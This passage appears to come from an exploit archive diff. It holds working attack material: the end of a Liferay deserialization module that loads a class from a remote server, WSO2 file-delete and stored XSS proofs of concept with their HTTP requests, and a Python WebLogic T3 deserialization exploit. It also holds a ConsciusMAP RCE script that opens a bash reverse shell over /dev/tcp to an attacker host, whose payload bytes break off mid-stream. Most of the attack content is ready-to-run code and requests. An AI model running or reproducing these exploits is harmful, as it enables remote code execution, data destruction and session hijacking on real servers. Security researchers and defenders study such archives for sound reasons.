# Start our HTTP server to provide remote classloading
@classloader_uri = start_service
unless @classloader_uri
fail_with(Failure::BadConfig, 'Could not start remote classloader server')
end
print_good("Started remote classloader server at #{@classloader_uri}")
# Send our remote classloader gadget to the target, triggering the vuln
send_request_gadget(
normalize_uri(target_uri.path, '/api/jsonws/expandocolumn/update-column'),
# Required POST parameters for /api/jsonws/expandocolumn/update-column:
# https://github.com/liferay/liferay-portal/blob/master/portal-impl/src/com/liferay/portlet/expando/service/impl/ExpandoColumnServiceImpl.java
'columnId' => rand(8..42), # Randomize for "evasion"
'name' => rand(8..42), # Randomize for "evasion"
'type' => rand(8..42) # Randomize for "evasion"
)
end
# Convenience method to send our gadget to a URI with desired POST params
def send_request_gadget(uri, vars_post = {})
print_status("Sending remote classloader gadget to #{full_uri(uri)}")
vars_post['+defaultData'] =
'com.mchange.v2.c3p0.WrapperConnectionPoolDataSource'
vars_post['defaultData.userOverridesAsString'] =
"HexAsciiSerializedMap:#{go_go_gadget.unpack1('H*')};"
send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => vars_post
}, 0)
end
# Generate all marshalsec payloads for the Jackson marshaller:
# java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a
def go_go_gadget
# Implementation of the Jackson marshaller's C3P0WrapperConnPool gadget:
# https://github.com/mbechler/marshalsec/blob/master/src/main/java/marshalsec/gadgets/C3P0WrapperConnPool.java
gadget = Rex::Text.decode_base64(
<<~EOF
rO0ABXNyAD1jb20ubWNoYW5nZS52Mi5uYW1pbmcuUmVmZXJlbmNlSW5kaXJlY3RvciRSZWZl
cmVuY2VTZXJpYWxpemVkYhmF0NEqwhMCAARMAAtjb250ZXh0TmFtZXQAE0xqYXZheC9uYW1p
bmcvTmFtZTtMAANlbnZ0ABVMamF2YS91dGlsL0hhc2h0YWJsZTtMAARuYW1lcQB+AAFMAAly
ZWZlcmVuY2V0ABhMamF2YXgvbmFtaW5nL1JlZmVyZW5jZTt4cHBwcHNyABZqYXZheC5uYW1p
bmcuUmVmZXJlbmNl6MaeoqjpjQkCAARMAAVhZGRyc3QAEkxqYXZhL3V0aWwvVmVjdG9yO0wA
DGNsYXNzRmFjdG9yeXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wAFGNsYXNzRmFjdG9yeUxvY2F0
aW9ucQB+AAdMAAljbGFzc05hbWVxAH4AB3hwc3IAEGphdmEudXRpbC5WZWN0b3LZl31bgDuv
AQMAA0kAEWNhcGFjaXR5SW5jcmVtZW50SQAMZWxlbWVudENvdW50WwALZWxlbWVudERhdGF0
ABNbTGphdmEvbGFuZy9PYmplY3Q7eHAAAAAAAAAAAHVyABNbTGphdmEubGFuZy5PYmplY3Q7
kM5YnxBzKWwCAAB4cAAAAApwcHBwcHBwcHBweHQABEhBQ0t0AANUSEV0AAZQTEFORVQ=
EOF
)
# Replace length-prefixed placeholder strings with our own
gadget.sub!("\x00\x04HACK", packed_class_name)
gadget.sub!("\x00\x03THE", packed_classloader_uri)
gadget.sub("\x00\x06PLANET", packed_class_name)
end
# Convenience method to pack the classloader URI as a length-prefixed string
def packed_classloader_uri
"#{[@classloader_uri.length].pack('n')}#{@classloader_uri}"
end
end

146
exploits/java/webapps/48313.txt Normal file
View file

@ -0,0 +1,146 @@
# Title: WSO2 3.1.0 - Arbitrary File Delete
# Date: 2020-04-12
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
Document Title:
===============
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )
##CVE not assigned yet
##Security Update : https://apim.docs.wso2.com/en/latest/
Common Vulnerability Scoring System:
====================================
8.5
Affected Product(s):
====================
WSO2 API Manager Carbon Interface
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A remote Arbitrary file delete vulnerability has been discovered in the official WSO2 API Manager Carbon UI product .
The security vulnerability allows a remote attacker with low privileges to perform authenticated application requests
and to delete arbitrary System files.
The vulnerability is located in the `/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the `extensionName` parameter
of the extension we want to delete. Remote attackers are able to delete arbitrary files as configuration files ,database(.db) files
via authenticated POST method requests with a crafted String arbitrary traversal files names in "extensionName" .
The security risk of the arbitrary delete vulnerability is estimated as High with a cvss (common vulnerability scoring system) count of 8.5.
Exploitation of the Path traversal vulnerability requires a low privilege web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of availability, integrity and confidentiality.
===============================
Error Generated by Server in case of file not found from 'logfile' ( broughts my atttention ...)
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove extension.
org.apache.axis2.AxisFault: File does not exist: E:\api-wso2\bin\..\repository\d
eployment\server\registryextensions\commons-dir
at org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.handleResponse(
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]
at org.apache.axis2.client.OperationClient.execute(OperationClient.java:
149) ~[axis2_1.6.1.wso2v38.jar:?]
at org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem
oveExtension(ResourceAdminServiceStub.java:5954) ~[org.wso2.carbon.registry.exte
nsions.stub_4.7.13.jar:?]
at org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.
deleteExtension(ResourceServiceClient.java:137) [org.wso2.carbon.registry.extens
ions.ui_4.7.13.jar:?]
at org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]
at org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t
omcat_9.0.22.wso2v1.jar:?]
*Error displayed in Web browser with body request:
<script type="text/javascript">
CARBON.showErrorDialog("File does not exist: E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");
</script>
=============================
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp
Vulnerable Parameter(s):
[+] extensionName
Server version
3.0.0
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privileged web-application user account and with no user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1-Attacker must have access to the Extension component(List ,Add ,Delete extensions )
2-attacker uploads any file .jar extension
3-attacker intercepts the request that follows and modifies the parameter with traversal string:
--- PoC Session Logs [POST] ---
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1
Host: localhost:9443
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS
Content-Length: 22
Origin: https://localhost:9443
Connection: close
Referer: https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B; requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add; region1_configure_menu=none; region3_registry_menu=visible; region4_monitor_menu=none; region5_tools_menu=none; current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523; MSG15780931689110.08734318816834985=true; MSG15780932448520.1389658752202746=true; MSG15780934638710.11615678726759582=true; MSG15780941514590.39351165459685944=true; MSG15780941548760.1587776077002745=true; MSG15780944563770.9802725740232142=true; MSG15780944882480.28388839177015013=true; MSG15780945113520.5908842754830942=true; menuPanel=visible; menuPanelType=extensions
Pragma: no-cache
Cache-Control: no-cache
extensionName=../../../../INSTALL.txt
---------------Returned Headers in Response------------------
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
Content-Type: text/html;charset=UTF-8
Content-Length: 10
Date: Sat, 04 Jan 2020 00:55:38 GMT
Connection: close
Server: WSO2 Carbon Server

142
exploits/java/webapps/48319.txt Normal file
View file

@ -0,0 +1,142 @@
# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting
# Date: 2020-04-13
# Author: raki ben hamouda
# Vendor: https://apim.docs.wso2.com
# Softwrare link: https://apim.docs.wso2.com/en/latest/
# CVE: N/A
# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700
Technical Details & Description:
================================
A remote Stored Cross Site Scripting has been discovered in WSO2 API
Manager Ressource Browser component).
The security vulnerability allows a remote attacker With access to the
component "Ressource Browser"
to inject a malicious code in Add Comment Feature.
The vulnerability is triggered after sending a POST request to
`/carbon/info/comment-ajaxprocessor.jsp` with Parameter
"comment=targeted&path=%2F".
Remote attackers has the ablility to spread a malware,to Hijack a session
(a session with Higher privileges), or to initiate phishing attacks.
The security risk of the Stored XSS web vulnerability is estimated as
medium with a cvss (common vulnerability scoring system) count of 5.4
Exploitation of the Stored XSS web vulnerability requires a low privilege
web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in Compromising the
server .
Request Method:
[+] POST
Module:
[+] /carbon/info/comment-ajaxprocessor.jsp
Parameters:
[+] comment=admincomment
[+] path=%2F
=======================================
POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1
Host: 192.168.149.1:9443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/
X-Requested-With: XMLHttpRequest, XMLHttpRequest
X-Prototype-Version: 1.5.0
Content-type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH
Content-Length: 64
Cookie: region3_registry_menu=visible; region3_metadata_menu=none;
wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e;
JSESSIONID=4B3AB3AA8895F2897685FA98C327D521;
requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none;
region4_monitor_menu=none; region5_tools_menu=none;
current-breadcrumb=registry_menu%252Cresource_browser_menu%2523
Connection: close
comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F
==============================
HTTP/1.1 200
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY
vary: accept-encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Tue, 31 Dec 2019 10:50:00 GMT
Connection: close
Server: WSO2 Carbon Server
Content-Length: 3144
//the body of response includes attacker malicious script
<a class="closeButton icon-link registryWriteOperation"
onclick="delComment('/','/;comments:33')" id="closeC0" title="Delete"
style="background-image:
url(../admin/images/delete.gif);position:relative;float:right">&nbsp;</a>
<iframe href=http://phishing_url>
<br/>
posted on 0m ago (on Tue Dec 31 11:50:00 GMT+01:00 2019) by attacker
Proof of Concept (PoC):
=======================
//Let's suppose we're Attacking an admin with higher privileges
1-Attacker opens his account
2-add arbitrary comment
3-intercepts the request
4-add malicious script to the comment
5-admin access his account,he wants to add a comment,the malicious script
got executed
===>Admin account compromised
===============================================================================
Example malicious script :
<script>
alert(document.cookie);
</script>
===============================================================================

90
exploits/java/webapps/48320.py Executable file
View file

@ -0,0 +1,90 @@
# Exploit Title: Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution
# Author: nu11secur1ty
# Date: 2020-03-31
# Vendor: Oracle
# Software Link: https://download.oracle.com/otn/nt/middleware/12c/122140/fmw_12.2.1.4.0_wls_Disk1_1of1.zip
# Exploit link: https://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-2555
# CVE: CVE-2020-2555
[+] Credits: Ventsislav Varbanovski (nu11secur1ty)
[+] Source: readme from GitHUB
[Exploit Program Code]
--------------------------
#!/usr/bin/python
# @nu11secur1ty
import socket
import os
import sys
import struct
if len(sys.argv) < 3:
print 'Usage: python %s <host> <port> </path/to/payload>' % os.path.basename(sys.argv[0])
sys.exit()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print '[+] Connecting to %s port %s' % server_address
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print 'sending "%s"' % headers
sock.sendall(headers)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
payloadObj = open(sys.argv[3],'rb').read()
payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
payload=payload+payloadObj
payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'
payload=struct.pack('>I',len(payload)) + payload[4:]
print '[+] Sending payload...'
sock.send(payload)
data = sock.recv(1024)
print >>sys.stderr, 'received "%s"' % data
[Vendor]
Oracle
[Vulnerability Type]
Network Remote
[Description]
Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation).
Supported versions that are affected are 3.7.1.17, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0.
Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle Coherence.
Successful attacks of this vulnerability can result in takeover of Oracle Coherence.
CVSS 3.0 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
[Disclosure Timeline]
2019/12/10
[+] Disclaimer
The entry creation date may reflect when the CVE ID was allocated or reserved,
and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
[Video]
https://www.youtube.com/watch?v=59jt8rr8ECc
@nu11secur1ty
--
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty

338
exploits/java/webapps/48380.txt Normal file
View file

@ -0,0 +1,338 @@
# Exploit Title: Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution
# Date: 2020-04-24
# Vendor Homepage: https://www.tecnoredsa.com.ar
# Exploit Authors: LiquidWorm
# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
# Version: 2.8.1
# CVE : N/A
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Furukawa Electric ConsciusMAP 2.8.1 Java Deserialization Remote Code Execution
#
#
# Vendor: Furukawa Electric Co., Ltd. | Tecnored SA
# Product web page: https://www.furukawa.co.jp | https://www.tecnoredsa.com.ar
# Affected version: APROS Evolution | 2.8.1
# FURUKAWA | 2.7.10
# ConsciusMAP | 2.6.4
# | 2.3.1
# | 2.1.49
# | 2.1.36
# | 2.1.31
# | 2.1.18
# | 2.1.16
# | 2.1.15
# | 2.1.1
# | 2.0.1174
# | 1.8
# | 1.4.70
#
# Summary: Apros Evoluation / Furukawa / ConsciusMap is the Tecnored
# provisioning system for FTTH networks. Complete administration of
# your entire external FTTH network plant, including from the ONUs
# installed in each end customer, to the wiring and junction boxes.
# Unify all the management of your FTTH network on a single platform.
# Unify all your data, whether from customers, your network, or the
# external plant in one place. APROS FTTH allows you to manage your
# entire FTTH network in a simple and globalized way with just one
# click, without being a network expert. Includes services such as:
# bandwidth limitation, Turbo Internet for time plans, BURST Internet,
# QinQ for companies, and many more. General consumption graphics and
# per customer in real time. Captive Portal for cutting or suspension
# of the service.
#
# Desc: The FTTH provisioning solution suffers from an unauthenticated
# remote code execution vulnerability due to an unsafe deserialization
# of Java objects (ViewState) triggered via the 'javax.faces.ViewState'
# HTTP POST parameter. The deserialization can cause the vulnerable JSF
# web application to execute arbitrary Java functions, malicious Java
# bytecode, and system shell commands with root privileges.
#
# ===================================================================
# $ ./furukawa.py 172.16.0.1:8080 172.168.0.200 4444
# [*] Setting up valid URL path
# [*] Starting callback listener child thread
# [*] Starting handler on port 4444
# [*] Sending serialized object
# [*] Connection from 172.16.0.1:48446
# [*] You got shell!
# tomcat7@zslab:/var/lib/tomcat7$ id
# uid=114(tomcat7) gid=124(tomcat7) grupos=124(tomcat7),1003(furukawa)
# tomcat7@zslab:/var/lib/tomcat7$ sudo su
# id
# uid=0(root) gid=0(root) grupos=0(root)
# exit
# tomcat7@zslab:/var/lib/tomcat7$ exit
# *** Connection closed by remote host ***
# ===================================================================
#
# Tested on: Apache Tomcat/7.0.68
# Apache Tomcat/7.0.52
# Apache MyFaces/2.2.1
# Apache MyFaces/2.1.17
# Apache MyFaces/2.0.10
# GNU/Linux 4.4.0-173
# GNU/Linux 4.4.0-137
# GNU/Linux 4.4.0-101
# GNU/Linux 4.4.0-83
# GNU/Linux 3.15.0
# GNU/Linux 3.13.0-32
# PrimeFaces/4.0.RC1
# Apache-Coyote/1.1
# ACC Library 3.1
# Ubuntu 16.04.2
# Ubuntu 14.04.2
# Java/1.8.0_242
# Java/1.8.0_181
# Java/1.8.0_131
# Java/1.7.0_79
# MySQL 5.7.29
# MySQL 5.7.18
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# Macedonian Information Security Research and Development Laboratory
# Zero Science Lab - https://www.zeroscience.mk - @zeroscience
#
#
# Advisory ID: ZSL-2020-5565
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5565.php
#
# CVE ID: CVE-2020-12133
# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-12133
#
#
# 24.02.2020
#
import os#############
import sys############
import gzip#######o###
import zlib###########
import socket#########
import base64#########
import urllib#########
import requests#######
import telnetlib######
import threading######
import subprocess#####
from io import BytesIO
from time import sleep
from flash import blic
class Optics:
def __init__(self):
self.callback = None#
self.headers = None##
self.payload = None##
self.target = None###
self.lport = None####
self.path = None#####
self.cmd = None######
def allears(self):
telnetus = telnetlib.Telnet()
print("[*] Starting handler on port {}".format(self.lport))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", self.lport))
while True:
try:
s.settimeout(8)
s.listen(1)
conn, addr = s.accept()
print("[*] Connection from {}:{}".format(addr[0], addr[1]))
telnetus.sock = conn
except socket.timeout as p:
print("[!] Probably not vulnerable... ({poraka})".format(poraka=p))
print("[+] Check your port mappings.")
s.close()
exit(0)
break
print("[*] You got shell!")
#
# UnicodeDecodeError dirty fix:
# /usr/lib/python3.6/telnetlib.py
# Change from 'ascii' to 'utf-8' (Lines: 553 and 556)
#
telnetus.interact()
conn.close()
def thricer(self):
print("[*] Starting callback listener child thread")
konac = threading.Thread(name="ZSL", target=self.allears)
konac.start()
sleep(1)
self.gadget()
def gadget(self):
self.cmd = "/bin/bash -c /bin/bash${IFS}-i>&/dev/tcp/"
self.cmd += self.callback
self.cmd += "/"
self.cmd += str(self.lport)
self.cmd += "<&1"
payload = b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C"
payload += b"\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03"
payload += b"\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\x00\x00\x00\x00"
payload += b"\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63"
payload += b"\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E"
payload += b"\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\x2E\x54\x69\x65\x64\x4D\x61"
payload += b"\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02"
payload += b"\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61"
payload += b"\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74"
payload += b"\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\x61\x70\x3B"
payload += b"\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68"
payload += b"\x75\x62\x2E\x63\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66"
payload += b"\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\x00\x2A\x6F\x72\x67\x2E"
payload += b"\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F"
payload += b"\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A"
payload += b"\x79\x4D\x61\x70\x6E\xE5\x94\x82\x9E\x79\x10\x94\x03\x00\x01\x4C\x00"
payload += b"\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\x2F\x61"
payload += b"\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C"
payload += b"\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72"
payload += b"\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\x61"
payload += b"\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65"
payload += b"\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43"
payload += b"\x68\x61\x69\x6E\x65\x64\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72"
payload += b"\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\x72"
